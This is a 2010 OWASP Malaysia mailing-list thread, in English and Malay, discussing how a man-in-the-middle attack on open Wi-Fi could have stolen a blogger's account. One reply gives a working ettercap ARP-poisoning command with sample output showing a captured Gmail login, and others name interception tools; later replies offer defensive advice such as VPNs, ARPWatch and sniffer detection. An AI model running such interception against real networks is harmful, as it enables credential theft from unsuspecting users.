[Owasp-Malaysia] Man In The Middle Attack Wireless

Amir Haris amirharis at gmail.com
Fri Sep 24 12:18:49 EDT 2010


This paper is quite old, but it helps us to understand on how to detect
sniffer.

www.linux-sec.net/Sniffer.Detectors/snifferdetection.pdf



On Fri, Sep 24, 2010 at 10:48 PM, Mohd Fazli Azran <mfazliazran at gmail.com>wrote:

> Hebat Guru Faizul nie buat live hack.. . memandangkan open network memang
> bermasalah lagi2 kalau ada di mamak,kopitiam, atau mana2 kedai yang
> memberikan access free wifi nie. Ramai rakyat Malaysia tidak sedar akan
> kebolehan para2 hacker ni mencuri maklumat tanpa disedari oleh pengguna yang
> rata2 nye bergumbira bila dapat Wifi free tapi belakang takbir mereka tak
> tau.
>
> Tapi please consider use VPN kalau nak masuk ke open network nie.. maybe
> akan banyak membantu anda untuk protect laptop anda dari di sniffer yang
> senantiasa membaca packet anda...
>
> Pastikan anda delete semua cookie yang ada dalam browser anda sebelum
> connect ke wifi tersebut. Pastikan yer!!
>
> Kalau untuk pengguna window tegar boleh try guna Hotspot Shield<http://anchorfree.com/downloads/hotspot-shield/>ini. banyak kebaikannya... amin!!! dah ada untuk iphone la .. boleh download
> untuk peminat2 iphone. :)
>
> Pastikan laptop anda tidak ada buat public file sharing.. pastikan tau!!!
>
> Last jangan connect terlampau lama dengan open network ni lagi lama anda
> connect lagi banyak information hackers2 ni dapat. Pastikan anda tidak leka
> dan lalai yer!!!
>
> Sebenarnya banyak lagi software yang boleh digunakan untuk protect laptop
> anda jika anda banyak explore dan menyelidik sedikit sebanyak tentang cara
> nak protect laptop anda especially untuk pengguna windows.. tapi jangan
> sangka pulak pengguna OS lain boleh terlepas... huhuhu.
>  P/S: kalau anda rasa anda seorang geek cuba guna ARPWatch, Arpsnmp atau
> DecaffeinatID anda mesti menyukainya.. :P
> On Fri, Sep 24, 2010 at 9:20 PM, Faizul <faizul at mysecurity.my> wrote:
>
>> ettercap -TqM ARP:REMOTE /10.1.1.10/ /10.1.1.254/ <--- 10 adalah target
>> dan 254 adalah gateway
>>
>> ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA <--- ini naga atau
>> dragon
>>
>> Listening on eth0... (Ethernet)
>>
>>   eth0 ->       00:0C:29:97:59:E4          10.1.1.1     255.255.255.0
>>
>> Privileges dropped to UID 0 GID 0...
>>
>>   28 plugins
>>   39 protocol dissectors
>>   53 ports monitored
>> 7587 mac vendor fingerprint
>> 1698 tcp OS fingerprint
>> 2183 known services
>>
>> Scanning for merged targets (2 hosts)...
>>
>> * |==================================================>| 100.00 %
>>
>> 2 hosts added to the hosts list...
>>
>> ARP poisoning victims:
>>
>>  GROUP 1 : 10.1.1.10 00:26:22:E1:6D:92
>>
>>  GROUP 2 : 10.1.1.254 00:1F:FB:08:D1:C6
>> Starting Unified sniffing...
>>
>>
>> Text only Interface activated...
>> Hit 'h' for inline help
>>
>> HTTP : 74.125.127.99:443 -> USER: 9w2pju  PASS: selamathariraya  INFO:
>> https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=1eic6yu9oa4y3
>>
>>
>> On Fri, Sep 24, 2010 at 8:30 PM, Amir Haris <amirharis at gmail.com> wrote:
>>
>>> Haris,
>>>
>>> Yes.. mmg possible sangat2. aku ada demo masa DNSSEC seminar...
>>>
>>>
>>> On Fri, Sep 24, 2010 at 8:17 PM, Hazrul Hamzah <hazrul at hazrulnz.net>wrote:
>>>
>>>>  Based on the blog post, plenty of tools can be used to perform such
>>>> attacks. Nowadays tools are getting more "user friendly" and yeah since
>>>> he's using insecure Wifi facility -visible network packets/traffics -
>>>> perhaps webmitm, dnsspoof can be used. Or perhaps sidejacking with
>>>> ferret and hamster is much more easier. But based on the symptoms or the
>>>> screenshots, it is more monkey in the middle attack compared to
>>>> sidejacking (I prefer this one).
>>>>
>>>> So, never access your private accounts using insecure or open ap
>>>> wireless environment. Guna la broadband.. :D
>>>>
>>>> p/s: besides I believe nobody actually read/understand/concern on the
>>>> warning popups regarding the cert validity. Usually we just click "Add
>>>> exception" and "proceed" :D
>>>>
>>>> That's my 2 halala
>>>>
>>>> Thanks
>>>>
>>>> On 24/09/2010 19:38, Fathi Kamil Zainuddin wrote:
>>>> > There is https/ssl mitm in the cain & abel using fake private/public
>>>> key. It intercepts the ssl handshake and providing the fake key (if the key
>>>> is not trusted) to the client. In my previous test, my friend realized a
>>>> fake ssl for maybank site when I'm running the attack, and he told me
>>>> maybank has been hacked (but not). For wireless (not ethernet) layer 2,
>>>> there is utility like airpwn and karma for this kind of attack. I haven't
>>>> read yet the blog but to answer first the question. Wallahualam.
>>>> > Sent from my BlackBerry® smartphone
>>>> >
>>>> > -----Original Message-----
>>>> > From: Harisfazillah Jamel <linuxmalaysia at gmail.com>
>>>> > Sender: owasp-malaysia-bounces at lists.owasp.org
>>>> > Date: Fri, 24 Sep 2010 19:21:31
>>>> > To: owasp-malaysia<owasp-malaysia at lists.owasp.org>
>>>> > Subject: Re: [Owasp-Malaysia] Man In The Middle Attack Wireless
>>>> >
>>>> > Tittle should be man in the minddle attack..
>>>> >
>>>> > ettercap can be used to capture packet. But its hard to get our
>>>> > password in HTTPS protocol. I believe a kind of proxy is used for
>>>> > this.
>>>> >
>>>> > Any idea what kind of proxy?
>>>> >
>>>> >
>>>> > On Fri, Sep 24, 2010 at 7:04 PM, Hasanuddin Abu Bakar <> wrote:
>>>> >> ARP poisoning can be used.ettercap
>>>> >>
>>>> >> On 24 Sep 2010 19:02, "Harisfazillah Jamel" <linuxmalaysia at gmail.com>
>>>> wrote:
>>>> >>> Assalamualaikum and salam sejahtera,
>>>> >>>
>>>> >>> Would like to share this blog post.
>>>> >>>
>>>> >>> http://blog.mohdhanif.com/aku-telah-berjaya-di-hack/
>>>> >>>
>>>> >>> How man in the middle attack can be used in this case?
>>>> >>>
>>>> >>> Thanks.
>>>> > _______________________________________________
>>>> > Owasp-Malaysia mailing list
>>>> > Owasp-Malaysia at lists.owasp.org
>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >
>>>> > OWASP Malaysia Wiki
>>>> > http://www.owasp.org/index.php/Malaysia
>>>> >
>>>> > OWASP Malaysia Wiki Facebook
>>>> >
>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> > _______________________________________________
>>>> > Owasp-Malaysia mailing list
>>>> > Owasp-Malaysia at lists.owasp.org
>>>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>> >
>>>> > OWASP Malaysia Wiki
>>>> > http://www.owasp.org/index.php/Malaysia
>>>> >
>>>> > OWASP Malaysia Wiki Facebook
>>>> >
>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>> >
>>>>
>>>> _______________________________________________
>>>> Owasp-Malaysia mailing list
>>>> Owasp-Malaysia at lists.owasp.org
>>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>>
>>>> OWASP Malaysia Wiki
>>>> http://www.owasp.org/index.php/Malaysia
>>>>
>>>> OWASP Malaysia Wiki Facebook
>>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>>
>>>
>>>
>>> _______________________________________________
>>> Owasp-Malaysia mailing list
>>> Owasp-Malaysia at lists.owasp.org
>>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>>
>>> OWASP Malaysia Wiki
>>> http://www.owasp.org/index.php/Malaysia
>>>
>>> OWASP Malaysia Wiki Facebook
>>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>>
>>
>>
>>
>> --
>> 73 de 9W2PJU
>>
>> http://9w2pju.blogspot.com
>>
>>
>> _______________________________________________
>> Owasp-Malaysia mailing list
>> Owasp-Malaysia at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>
>> OWASP Malaysia Wiki
>> http://www.owasp.org/index.php/Malaysia
>>
>> OWASP Malaysia Wiki Facebook
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>>
> Mohd Fazli Azran
> Pengguna Internet Tegar
>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-malaysia/attachments/20100925/1d6961d9/attachment.html 


More information about the Owasp-Malaysia mailing list